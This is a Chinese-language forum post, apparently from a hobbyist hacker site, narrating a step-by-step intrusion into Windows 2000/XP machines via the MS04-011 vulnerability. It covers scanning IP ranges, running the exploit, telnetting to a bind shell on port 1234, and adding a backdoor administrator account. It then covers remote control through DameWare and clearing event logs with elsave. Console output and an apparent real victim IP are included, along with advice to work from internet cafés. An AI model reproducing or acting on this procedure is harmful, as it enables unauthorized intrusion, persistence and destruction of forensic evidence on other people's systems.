ms0411的成功入侵过程
登陆很多的黑客网站发现MS0411真的成了大热们!
虽然我知道得比较迟但我想有些老粗知道了也懒得去更正下载补钉!
唉!原来入侵就是那么容易,愿来就那么容易把你干掉了,不过我还是不敢下手!
有一台是同胞的!
好了长话短说啦!去行动吧!
我用了不少方法花了一个晚上,最后我发现这样搭配最快,三分钟不要就行啦!
工具:一个MS04011的工具包
一般的都包括:Dsscan.exe(扫描用的)
getos.exe(判断操作系统的版本)
ms04011.exe(主程序)
另外需要一DameWare NT Utilities 工具
elsave.exe(清理工具)
最重要的是一颗善良的耐心!
在桌面打开www.BAIDU.COM吧
那些所有的工具你都可以打入相关字找到!如找ms04011工具包:
打入ms04011工具 下载 黑客 就可以找到拉!请合理输入关键字!
ACTION:
推荐在win2000运行,在网吧运行.因为我是菜鸟.我暂时很多东西不完全善
不能随便用固定电脑!
先把上面的 getos.exe ms04011.exe elsave.exe 解压缩后COPY到
C 盘winnt目录下!OK
直接点DSSCANNER.EXE 执行输入一个IP段,推荐先下载一些IP库找外国的或台湾的
在扫描信息框中
XXX.XXX.XXX.XXX,"XX","XXX","VULNERABLE" 是成功可用的
点击一个右键选COPY IP TO CLIBOARD
打开CMD的命令行
输入getos.exe xxx.xxx.xxx.xx.回车
显示为2000的系统或更高的配置信息
输入MS04011.EXE 0(对方是WIN2K) IP
如果是XP的操作系统(对方):"0"改为"1"
如果光标停了好一会就可以打开第二个CMD窗口
输入telnet ip 1234 回车
便可登陆出现对方的CMD对话框实际上你可以操作啦!
如DIR 显示对方的目录
如CD X
切换目录到X
CD \回到根目录
.............
一般是把自己的权限提高再说:
net user
net user KEN XXXXXX /ADD (XXXXX是密码)(KEN是用户名)意思是添加用户KEN 密码是XXXXXXX
net localgroup Administrator KEN /add (把KEN添加到管理员的组那边)
net user
你就看到自己是管理员啦!
如果失败试多几次就行!
然后打开DameWare NT Utilities
添加计算机成功连接后
选择远程控制若果是对方的3389没开系统会提示你安装对方的3389终端的!
在这些操作之前可用新建的用户命和密码!
然后请你看DameWare NT Utilities使用说明书
你可以做很多东东哦
看你的发挥啦!
我就看到了对方的屏幕就停拉
自己人啊?
而且对方不知什么工具探测到我的来访我还是撤退!
没人再来!
elsave -s \\xxxxxx -l "system" -C
elsave -s \\xxxxxxx -l "security" -C
elsave -s \\xxxxxxx -l "application" -C
xx是IP
在自己的机上运行CMD 输入上面的命令首先elsave.exe 需在根目录下!
例子
C:\>getos.exe 000 000 000 000
Remote OS:
----------
FAS1.PWC.CO.JP
Windows 2000 LAN Manager
Windows 5.0
C:\>ms04011.exe 0 000 000 000 000
shellcode size 404
Ret value = 1727
telnet 000 000 000 000 1234
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>net user
Administrator Guest
The command completed with one or more errors.
C:\WINNT\system32>NET USER KEN /ADD
The command completed successfully.
C:\WINNT\system32>NET LOCALGROUP ADMINISTRATORS KEN /ADD
The command completed successfully.
然后你就用DameWare NT Utilities
自由发挥吧!
好了谢谢看了我那么多的废话
这是我的第一次哦
糟了我忘记清除场!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
不是菜鸟第一次
恳请高手指点!
小榕的elsave.exe远程清除system,applicaton,security的软件,使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /user: user
然后命令行下:elsave -s \\ip -l application -C,这样就删除了安全日志。
elsave -s \\210.7.248.4 -l system -C
elsave -s \\210.7.248.4 -l applicaton -C
elsave -s \\210.7.248.4 -l security -C
210.7.248.4,"WIENERT-W2K","WIENERT-W2K","VULNERABLE"
|
|
设为首页 
加入收藏 
联系我们 繁體中文 
